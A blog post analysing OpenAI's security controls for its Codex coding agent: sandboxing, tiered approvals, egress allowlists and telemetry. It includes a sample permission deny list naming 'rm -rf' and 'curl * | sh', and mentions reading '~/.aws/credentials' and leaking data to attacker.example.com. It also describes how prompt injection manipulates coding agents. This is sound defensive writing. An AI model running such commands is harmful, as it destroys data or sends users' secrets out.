· 6 min read ·

Sandboxing the Coder: What OpenAI's Codex Security Model Tells Us About Agent Infrastructure

Source: openai

OpenAI just published a piece called Running Codex safely at OpenAI, describing the controls they wrap around their internal coding agent: sandboxing, approval gates, network egress policies, and what they call agent-native telemetry. It is a useful artifact because it shows how a company that has every incentive to ship agents quickly is actually constraining them in production. The interesting question is not whether sandboxing is a good idea (it obviously is), but what the specific shape of these controls tells us about where coding agents break, and how other tools in the same space are converging on similar answers.

I build Discord bots that occasionally execute user-supplied code, and I spend a lot of time in Claude Code and Cursor. The threat model for a coding agent is genuinely different from a chat assistant, and the OpenAI post is one of the clearer public statements of what that model looks like inside a frontier lab.

The threat model nobody used to take seriously

A chat assistant that hallucinates is embarrassing. A coding agent that hallucinates can rm -rf your repo, push secrets to a public branch, or quietly exfiltrate data through a curl call buried in a build script. The attack surface widened the moment we gave models shell access.

There are roughly three failure modes worth separating:

  1. The model makes a mistake. It writes a destructive command because it misunderstood the task.
  2. The model is manipulated. Prompt injection from a README, a dependency, an issue comment, or a webpage convinces it to do something the user did not ask for. Simon Willison has catalogued these for years, and the pattern keeps showing up in real agent deployments.
  3. The model is fine but the environment is compromised. A malicious package, a poisoned MCP server, or a hijacked dev container does the damage while the agent looks innocent.

OpenAI’s controls map cleanly onto these. Sandboxing limits blast radius for case 1. Approval gates and network policies address case 2 by forcing a human decision before anything irreversible happens. Telemetry is the only realistic defence against case 3, because by the time you suspect environment compromise you need a trail to follow.

Sandboxing is the unglamorous foundation

The Codex post emphasises running agents inside isolated environments with restricted filesystem and network access. This is not novel; it is just the only thing that works.

The industry has roughly settled on a few patterns:

  • Container-based isolation. Codex CLI and GitHub Copilot Workspace lean on ephemeral containers. The agent gets a fresh filesystem per task, network can be filtered at the container boundary, and cleanup is docker rm.
  • OS-level sandboxes. Claude Code uses Bubblewrap on Linux and Seatbelt on macOS to confine the process without spinning up a full container. Lower overhead, narrower escape surface than a VM, more portable than container assumptions.
  • Remote execution. Devin, Replit Agent, and similar products move the entire workspace to a managed cloud sandbox. The user’s machine is never directly exposed.

Each has trade-offs. Containers are heavy if you spin one up per command. OS sandboxes are tighter but harder to reason about across platforms; the Seatbelt profile language is genuinely obscure. Remote sandboxes solve isolation by punting it to someone else’s infrastructure, which moves the trust question rather than answering it.

The Codex piece does not specify which mechanism their internal deployment uses, but the principle is the same: agents should not have ambient authority to the host. That sounds obvious until you realise how many shell snippets posted in agent demos run with the user’s full shell environment, full PATH, and full SSH keys.

Approvals are a UX problem disguised as a security problem

OpenAI describes tiered approvals: some actions run freely, some require confirmation, some are blocked outright. This is the same pattern in Claude Code’s permission modes (default, accept-edits, bypass-permissions, plan) and in Aider’s --yes and --auto-commits flags.

The hard part is not the policy engine. It is calibrating the prompt frequency. Too many approvals and users develop habituation, clicking through whatever the agent shows. Too few and you have given the agent root by default. The Codex post hints at this with the framing of agent-native telemetry feeding back into policy decisions, which is the right instinct: the static policy needs to learn from observed behaviour, not be hand-tuned forever.

A reasonable allowlist looks something like this:

{
  "permissions": {
    "allow": [
      "Bash(git status:*)",
      "Bash(git diff:*)",
      "Bash(npm test:*)",
      "Read(**/*)",
      "Grep(**/*)"
    ],
    "deny": [
      "Bash(rm -rf:*)",
      "Bash(git push --force:*)",
      "Bash(curl * | sh)"
    ]
  }
}

The denylist is where the security work hides. curl | sh is the obvious one; the subtle ones are commands that look benign in isolation but compose into exfiltration paths, like cat ~/.aws/credentials followed by an unrelated-looking network call.

Network egress is where most of the action is

The network policy section of OpenAI’s post deserves more attention than it usually gets. A sandboxed agent that can still hit arbitrary HTTPS endpoints can leak anything in its context window through DNS, query parameters, or a webhook to attacker.example.com.

The robust answer is allowlist-based egress: the agent can talk to the package registry it needs, the API endpoints declared by the task, and nothing else. Snyk has documented how supply-chain attacks routinely use install-time scripts to exfiltrate to one-off domains, and an agent that runs npm install without egress filtering inherits that risk.

Most developer setups today have no egress filter. The agent runs as the user, with the user’s network reachability, which is everything. Tightening this is one of the highest-leverage moves a team can make, and it does not require waiting for the agent vendor to ship anything new; an outbound firewall rule on the sandbox is enough.

Agent-native telemetry is the new ask

The phrase agent-native telemetry is the most forward-looking part of the OpenAI piece. Traditional observability assumes humans drive the system. Logs are written for humans, alerts fire for humans, and the SOC reads dashboards. Agents change the shape of the traffic: more requests, more tool calls, more decisions per minute, and decisions whose rationale lives inside a model’s context rather than in code.

What that means in practice is logging tool calls with the prompts that produced them, retaining the reasoning chain when available, and correlating actions back to the originating user intent. OpenTelemetry’s GenAI semantic conventions are moving in this direction, with span attributes for model name, token counts, and tool invocations. Langfuse, Helicone, and Arize Phoenix are building products around exactly this surface.

For a coding agent specifically, the telemetry questions worth answering are: which files did the agent read before making a change, what commands did it run that did not produce visible output, did it ever attempt a denied action, and how did its plan evolve across turns. None of those are well-served by traditional application logs.

What to take from this

The Codex write-up is not a research paper and it does not need to be. It is a public statement that even OpenAI, running its own coding agent on its own infrastructure, does not give the model ambient authority. The implicit message to everyone else is that you should not either.

If you are deploying a coding agent in a team, the practical short list is small. Pick a sandbox mechanism appropriate for your platform and make sure the agent runs inside it by default. Configure an egress allowlist on that sandbox, even if it is just blocking everything except your package registry. Write a permission policy that requires approval for anything that touches the network, the filesystem outside the project, or version control history. Capture tool-call telemetry somewhere durable. The remaining gaps are things vendors will close over the next year, but the four above are within reach today.

The agent layer is still young enough that conventions are forming. It is a good moment to push on the security side before the defaults harden in the wrong place.

Was this interesting?